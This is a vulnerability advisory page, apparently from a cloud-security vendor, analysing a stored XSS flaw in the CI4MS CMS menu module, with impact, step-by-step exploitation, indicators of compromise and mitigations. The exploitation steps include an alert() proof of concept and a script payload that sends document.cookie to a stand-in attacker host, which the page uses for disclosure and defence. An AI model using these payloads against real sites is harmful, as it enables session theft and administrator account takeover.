CVE-2026-34564: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34564 is a stored DOM-based cross-site scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton, affecting all versions up to and including 0.28.6.0. The flaw resides in the Menu Management module's Pages section, where user-controlled input is stored server-side and rendered without proper output encoding in both administrative interfaces and public-facing navigation menus. The vulnerability was published on March 31, 2026, and patched in version 0.31.0.0. It carries a CVSS v3.1 base score of 9.1 (Critical) (Github Advisory, CI4MS Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where the application fails to apply HTML entity encoding or input sanitization before storing and rendering page-related data added to navigation menus. The vulnerable endpoint is /backend/menu/, where page entries are stored without sanitization and later rendered using unsafe DOM manipulation methods (e.g., .html(), innerHTML) or equivalent server-side templating sinks. An attacker with low-privilege access (e.g., any authenticated user with Menu Management permissions) can inject a persistent JavaScript payload that executes in the browsers of all users — including administrators — who view the affected menu. A proof-of-concept payload such as <img src=x onerror=alert(document.domain)> is documented in the advisory (Github Advisory, CI4MS Advisory).

Impact

Successful exploitation enables persistent execution of arbitrary JavaScript in the browsers of all users who view the affected navigation menu, including administrators. This can lead to full administrator account takeover, privilege escalation across all roles, session cookie theft, unauthorized actions performed on behalf of victims, and redirection to malicious sites. Because the payload is injected into a globally rendered navigation component, the entire application is effectively compromised upon exploitation (Github Advisory, CI4MS Advisory).

Exploitability

A proof-of-concept exploit with step-by-step reproduction instructions is publicly available in the GitHub Security Advisory, including a video PoC hosted externally. The advisory classifies the exploit confidence as high, with the PoC targeting the /backend/menu/ endpoint. There is no current evidence of in-the-wild exploitation or threat actor attribution. The EPSS score is approximately 0.046% (0.000460), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA KEV catalog (Github Advisory, CI4MS Advisory).

Exploitation steps

  1. Authenticate: Log in to the CI4MS application with any account that has Menu Management permissions (low-privilege access is sufficient).
  2. Navigate to Menu Management: Access the backend at /backend/menu/ and open the Menu Management section.
  3. Access the Pages section: Within Menu Management, navigate to the Pages functionality used to add pages to navigation menus.
  4. Inject XSS payload: Create or select a page entry and insert a malicious JavaScript payload into a page-related field, such as <img src=x onerror=alert(document.domain)> or a more sophisticated payload designed to steal session cookies (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  5. Save the menu entry: Submit the form to store the malicious entry server-side without sanitization.
  6. Trigger execution: The payload executes automatically whenever any user — including administrators — views the navigation menu in the administrative panel or any public-facing page that renders the menu.
  7. Achieve objective: Capture administrator session cookies or tokens to perform full account takeover, escalate privileges, or conduct further actions within the application (Github Advisory, CI4MS Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to attacker-controlled domains (e.g., cookie exfiltration endpoints) originating from pages that render the CI4MS navigation menu; unusual redirects from /backend/menu/ or public-facing pages.
  • Logs: Backend access logs showing POST requests to /backend/menu/ containing HTML tags or JavaScript syntax (e.g., <script>, onerror=, alert() in page-related parameters; repeated access to the menu endpoint from multiple user accounts in a short timeframe.
  • File System / Database: Stored menu entries in the database containing raw HTML or JavaScript payloads (e.g., <img, <script>, onerror=, javascript:) in page title or URL fields rather than plain text.
  • Browser / Session: Unexpected session invalidation or new administrator sessions created from unfamiliar IP addresses following menu page views, potentially indicating session hijacking (Github Advisory).

Mitigation and workarounds

The vendor has released a patch in CI4MS version 0.31.0.0, which includes global input validation, enhanced XSS protection, and CSRF token improvements. All users should upgrade to version 0.31.0.0 or later immediately. As interim mitigations: restrict Menu Management access to trusted administrators only; implement a strict Content Security Policy (CSP) to limit unauthorized script execution; set HttpOnly, SameSite, and Secure attributes on session cookies; and audit existing stored menu entries in the database for malicious payloads (Github Advisory, CI4MS Release).

Community reactions

The vulnerability was reported by researchers bugmithlegend and peeefour and published by the CI4MS maintainer bertugfahriozer on March 31, 2026. The advisory was picked up by automated CVE tracking feeds including CVEFeed, VulDB, and Bluesky CVE bots shortly after publication. No significant independent researcher commentary or major media coverage has been identified beyond standard vulnerability aggregator listings (CI4MS Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management